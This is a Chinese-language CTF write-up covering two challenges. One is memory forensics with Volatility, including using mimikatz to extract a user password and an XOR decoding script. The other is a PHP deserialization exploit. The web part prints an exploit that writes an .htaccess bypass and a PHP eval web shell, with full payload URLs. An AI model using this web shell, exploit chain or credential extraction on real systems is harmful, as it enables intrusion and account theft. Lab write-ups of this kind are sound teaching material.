第十四周 20230717
1、MISC-卡比卡比卡比
题目下载之后得到两个文件,!@#$unimportance
和内存取证.raw
其中unimportance
未知文件格式,可能是某种加密软件的产物,但是暂时看不出来
然后通过vol.py进行内存取证分析,首先通过pslist查找可疑的程序
vol.py -f 内存取证.raw --profile=Win7SP1x64 pslist
发现启动过ie浏览器和cmd.exe,可以通过iehistory查看浏览记录和cmd的命令行
先查看ie的浏览历史,内容比较多,可以通过导出到iehistory.txt中接着分析
分析发现一些有用的信息
一个文件
file:///C:/Program%20Files%20(x86)/MSBuild/key.png
bing.cn的搜索记录
http://cn.bing.com/search?q=怎样设置文件名能够更安全,不被发现&qs=ds&form=QBRE
http://cn.bing.com/search?q=在文件名前加一个前缀&form=PRCNZH&ocid=iehp&httpsmsn=1&msnews=1&refig=e629761cdada4269b19f274534c67bed
然后将key.png导出
vol.py -f 内存取证.raw --profile=Win7SP1x64 filescan | grep key.png
vol.py -f 内存取证.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000003e5e94c0 -D .
发现key.png内容不是图片,然后通过010edit打开并存在字符集为中文可以看到内容
内容为:
我记得我存了一个非常棒的视频,但怎么找不到了,会不会在默认文件夹下
windows的视频默认位置为C:\Users\用户名\Videos\
发现文件ohhhh
下载文件vol.py -f 内存取证.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000003e248a90 -D .
文件内容只有xzkbyyds!
然后接着查询cmd的命令,通过cmdscan
和cmdline
发现5201314字符串
然后通过filescan接着搜索5201314字符串,
发现得到5201314tips是一个压缩包
接着发现这个压缩包需要密码,同时各种爆破方式都不可以,查找下用户的密码尝试一下
发现用户qiyue的密码MahouShoujoYyds
mimikatz安装过程中的问题,
github下载mimikatz.py,并复制到/usr/local/lib/python2.7/dist-packages/volatility/plugins/
python2 -m pip uninstall construct
如果删除错误,那么先安装到最新版本
python2 -m pip install --ignore-installed construct
出现egg错误,重新安装setuptools
python2 -m pip install setuptools
python2 -m pip install construct==2.5.5-reupload
然后解压得到exp文件
import struct
#key = '*********'
key = 'xzkbyyds!'
# xzkbyyds!
fp = open('!@#$unimportance', 'rb')
fs = open('!@#$importance', 'wb')
data = fp.read()
for i in range(0, len(data)):
result = struct.pack('B', data[i] ^ ord(*key[i % len(key)]))
fs.write(result)
fp.close()
fs.close()
得到一个gif文件,然后发现图片的高度小于宽度,猜测可能修改了高度
然后将gif全部分离,然在114帧发现flag
得到flag如下:
DASCTF{Kirby_Yyds}
2、WEB-WriteIt
通过目录扫描发现robots.txt,提示存在oh_somesecret,然后访问
url:http://80.endpoint-3450c8c26e5641c7bc841deea2d7e19f.m.ins.cloud.dasctf.com:81/oh_somesecret/
得到源码如下:
<?php
highlight_file(__FILE__);
class OhYouFindIt{
public $content = "Hello Hacker.<br>";
function __destruct(){
echo $this->content;
}
}
class writeshell{
public $filename;
public $content;
function __toString()
{
if(!in_array(pathinfo($this->filename, PATHINFO_EXTENSION), ['php', 'php3', 'php4', 'php5', 'phtml', 'pht'], true)) {
system('rm -rf ../upload/*');
file_put_contents("../upload/".$this->filename, $this->content);
echo "ok~ You File is"."../upload/".$this->filename;
}else{
exit("Go Way Hacker");
}
return "";
}
}
$content = $_GET['content'];
if (!isset($content))
{
$a = new OhYouFindIt();
}else{
unserialize(base64_decode($content));
}
?>
Hello Hacker.
文件上传,然后是黑名单,然后考虑是不是可以通过.htaccess
文件绕过
编写exp如下:
<?php
class OhYouFindIt{
public $content;
public function __construct($content){
$this->content = $content;
}
}
class writeshell{
public $filename;
public $content;
public function __construct($filename,$content){
$this->filename = $filename;
$this->content = $content;
}
}
#$write = new writeshell('.htaccess','AddType application/x-httpd-php .png');
$write = new writeshell('1.png','<?php eval($_POST[1]);?>');
$oh = new OhYouFindIt($write);
echo base64_encode(serialize($oh));
?>
上传.htaccess
文件,payload1:
http://80.endpoint-3450c8c26e5641c7bc841deea2d7e19f.m.ins.cloud.dasctf.com:81/oh_somesecret/?content=TzoxMToiT2hZb3VGaW5kSXQiOjE6e3M6NzoiY29udGVudCI7TzoxMDoid3JpdGVzaGVsbCI6Mjp7czo4OiJmaWxlbmFtZSI7czo5OiIuaHRhY2Nlc3MiO3M6NzoiY29udGVudCI7czozNjoiQWRkVHlwZSBhcHBsaWNhdGlvbi94LWh0dHBkLXBocCAucG5nIjt9fQ==
上传木马文件,payload2:
http://80.endpoint-3450c8c26e5641c7bc841deea2d7e19f.m.ins.cloud.dasctf.com:81/oh_somesecret/?content=TzoxMToiT2hZb3VGaW5kSXQiOjE6e3M6NzoiY29udGVudCI7TzoxMDoid3JpdGVzaGVsbCI6Mjp7czo4OiJmaWxlbmFtZSI7czo1OiIxLnBuZyI7czo3OiJjb250ZW50IjtzOjI0OiI8P3BocCBldmFsKCRfUE9TVFsxXSk7Pz4iO319
然后通过蚁剑进行连接,在根目录发现flag
flag如下:
DASCTF{89998926496735220698671699667918}